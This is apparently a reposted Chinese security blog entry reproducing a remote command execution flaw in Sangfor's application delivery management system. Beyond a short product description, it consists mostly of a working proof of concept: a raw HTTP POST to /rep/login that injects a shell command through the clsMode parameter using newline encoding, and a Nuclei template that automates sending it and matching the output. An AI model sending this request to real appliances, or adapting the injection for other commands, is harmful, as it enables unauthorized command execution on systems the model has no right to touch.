【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

admin

103432
文章

87
评论

2023年10月17日08:28:15评论30 views字数 991阅读3分18秒阅读模式

漏洞概述

深信服AD作为专业的应用交付产品，能够为客户的应用发布提供包括多数据中心负载均衡、多链路负载均衡、服务器负载均衡的全方位解决方案。

深信服应用交付管理系统clsMode存在远程命令执行漏洞，攻击者可利用该漏洞执行系统命令。

【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

漏洞复现

POC:

POST /rep/login HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded userID=admin&userPsw=admin&page=login&log_type=report&index=index&clsMode=cls_mode_login%0Aid%0A

【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

NUCLEI POC

【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

id: sangfor-ad-clsmode-rce info:  name: 深信服应用交付管理系统clsMode远程命令执行漏洞  author: YGnight  severity: high  description: description  reference:    - https://  tags: tags requests:  - raw:      - |-        POST /rep/login HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0        Content-Length: 120        Accept-Encoding: gzip, deflate        Content-Type: application/x-www-form-urlencoded         userID=admin&userPsw=admin&page=login&log_type=report&index=index&clsMode=cls_mode_login%0Aid%0A     matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        words:          - 'suid'

原文始发于微信公众号（night安全）：【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

记某高校渗透测试24-0506

PHP开发中的不安全反序列化

从 SQL 注入到远程代码执行

记某积分商城任意金额支付漏洞分析利用及思考

对C2 Havoc的流量检测分析含检测脚本

记【phpMyAdmin默认安装漏洞】

某积分商城任意金额支付漏洞分析利用及思考

未授权访问合集

安服仔养成篇——基线检查

黑掉Apple 系列 - 从 SQL 注入到远程代码执行

发表评论

在线咨询

微信